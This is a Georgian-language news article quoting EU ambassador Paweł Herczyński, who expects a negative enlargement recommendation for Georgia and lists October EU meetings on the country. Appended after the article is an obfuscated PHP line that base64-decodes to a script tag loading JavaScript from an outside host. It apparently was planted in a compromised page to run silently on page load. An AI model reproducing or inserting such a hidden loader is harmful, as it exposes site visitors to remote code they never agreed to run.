celsiusi
ავერსი საქკაბელი

 დიდი ალბათობით, ევროკომისიის რეკომენდაცია საქართველოს გაწევრიანებაზე არ იქნება პოზიტიური და მოლაპარაკებების გახსნა კიდევ უფრო ნაკლებად სავარაუდოა, – ამის შესახებ საქართველოში ევროკავშირის ელჩმა, პაველ ჰერჩინსკიმ განაცხადა.

ჰერჩინსკის კითხვა დაუსვეს გაფართოების ანგარიშთან დაკავშირებით, არის თუ არა შანსი, რომ საქართველოს ევროკავშირში გაწევრიანების შესახებ მოლაპარაკებების გახსნის კუთხით პოზიტიური შეფასება იყოს.

„სამწუხაროდ, ამ კითხვას ვერ გავცემ პასუხს. უნდა დაველოდოთ გაფართოების შესახებ ანგარიშის გამოქვეყნებას, მაგრამ შემიძლია გავიმეორო, რაც უკვე ვთქვი, რომ ევროკავშირის ლიდერების გადაწყვეტილებას თუ გავითვალისწინებთ, გაეჩერებინათ საქართველოს ევროკავშირში გაწევრიანების პროცესი, რომ საქართველოს ხელისუფლების წარმომადგენლებისგან ეთხოვათ განმარტება ნამდვილ განზრახვებზე საქართველოს ევროკავშირში გაწევრიანებასთან დაკავშირებით, მაშინ, დიდი ალბათობით, რეკომენდაცია პოზიტიური არ იქნება. კიდევ უფრო ნაკლებად სავარაუდოა პოზიტიური გადაწყვეტილება 27 წევრი სახელმწიფოს მიერ, რომელიც ერთსულოვნად მიიღება, გაიხსნას მოლაპარაკებები საქართველოს ევროკავშირში გაწევრიანების შესახებ“, – განაცხადა პაველ ჰერჩინსკიმ.

ამასთან, პაველ ჰერჩინსკის თქმით, მომდევნო დღეებსა და კვირებში ევროკავშირის 27 წევრი სახელმწიფო საქართველოს საკითხს განიხილავს.

„მომდევნო დღეებსა და კვირებში საქართველოს საკითხი და საქართველოში არსებული ვითარება განხილული იქნება ევროკავშირის 27 წევრ სახელმწიფოს შორის. ფაქტობრივად, მინდა გითხრათ, რომ მხოლოდ ხვალ, 8 ოქტომბერს, გაიმართება საპარლამენტო დებატები საქართველოზე. უმაღლესი წარმომადგენელი, ვიცე-პრეზიდენტი მოწვეულია, რომ სიტყვით გამოვიდეს. ვფიქრობ, ამას ერთ-ერთი კომისარი გააკეთებს მისი სახელით. შემდეგ, მომავალ კვირას, 14 ოქტომბერს გაიმართება ევროკავშირის საგარეო საქმეთა მინისტრების შეხვედრა, სადაც კვლავ ოფიციალურად არის შეტანილი საქართველო დღის წესრიგში ე.წ. მიმდინარე საკითხების ქვეშ.

27 მინისტრს ექნება შანსი, განიხილოს საქართველოში არსებული ვითარება. შემდეგ, 17 და 18 ოქტომბერს გვექნება ევროპული საბჭო, და როგორც ვიცი, ევროპული საბჭოს პრეზიდენტმა, შარლ მიშელმა ასევე შესთავაზა ლიდერებს, ევროკავშირის 27 ქვეყნის პრემიერ-მინისტრსა და პრეზიდენტს, განიხილონ საქართველოს საკითხი. ბოლოს, მაგრამ არანაკლებ მნიშვნელოვანია, ჩვენ ველოდებით გაფართოების ანგარიშს საქართველოზე, რომელიც გამოქვეყნდება ოქტომბრის მეორე ნახევარში, რაც სავარაუდოდ იქნება არჩევნებამდე რამდენიმე დღით ადრე ან არჩევნების შემდეგ რამდენიმე დღეში.

ის ფაქტი, რომ საქართველოს საკითხი განიხილება ევროპარლამენტში, საქართველოში არსებული ვითარება განიხილება 27 ქვეყნის საგარეო საქმეთა მინისტრს შორის და საქართველოში არსებული ვითარება განხილული იქნება ევროკავშირის ლიდერებს შორის, არ არის კარგი ნიშანი. ეს ნიშნავს, რომ ლიდერები შეშფოთებულნი არიან. ეს ნიშნავს, რომ ჩვენ ვღელავთ მოვლენების განვითარების გამო. როგორც უკვე გითხარით, ნამდვილად გულსატკენი იყო ივნისში, ბოლო ევროპული საბჭოს დროს იმის ნახვა, რომ ევროკავშირის 27 ქვეყნის პრეზიდენტებმა და პრემიერ-მინისტრებმა კოლექტიურად მიიღეს გადაწყვეტილება, შეეჩერებინათ საქართველოს ევროკავშირში გაწევრიანების პროცესი. ამავდროულად, მათ გადაწყვიტეს, დაეჩქარებინათ უკრაინისა და მოლდოვის გაწევრიანების პროცესი. ეს აუცილებელი გახდა შემაშფოთებელი საკანონმდებლო ინიციატივების, საქართველოს ხელისუფლების ძალიან შემაშფოთებელი ინიციატივების, ანტიდასავლური, ანტიევროპული პროპაგანდისტული ნარატივებისა და შეთქმულების თეორიების გამო, რომლებიც არ შეწყვეტილა. ეს იყო დრამატული გადაწყვეტილება, მაგრამ ეს არის დღევანდელი ევროკავშირ-საქართველოს ურთიერთობების რეალობა, რომელიც, გულწრფელად იმედი მაქვს, შეიცვლება არჩევნების შემდეგ, ვინც არ უნდა გაიმარჯვოს არჩევნებში“, – განაცხადა პაველ ჰერჩინსკიმ.

59
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");